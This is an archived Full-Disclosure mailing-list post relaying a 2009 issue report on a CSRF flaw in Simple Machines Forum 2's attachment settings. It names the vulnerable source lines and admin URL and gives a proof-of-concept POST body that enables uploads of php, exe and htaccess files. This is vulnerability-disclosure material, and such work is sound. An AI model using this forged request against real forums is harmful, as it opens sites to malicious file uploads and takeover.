|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
smf2-review
googlecode.com
Date: Tue Dec 01 2009 - 21:37:54 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Updates:
Status: Arreglada
Labels: -Notificar-SMF Notificar-FD
Comment #6 on issue 13 by sirdarckcat: Attached files configuration CSRF
http://code.google.com/p/smf2-review/issues/detail?id=13
Description: Attached files configuration CSRF
Discovered by: WHKelhacker.net
Vulnerable code: Sources/ManageAttachments.php#117
Sources/ManageAttachments.php#162
Vulnerable URL:
/index.php?action=admin;area=manageattachments;sa=attachments
PoC: POST:
attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150
--
You received this message because you are listed in the owner
or CC fields of this issue, or because you starred this issue.
You may adjust your issue notification preferences at:
http://code.google.com/hosting/settings
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]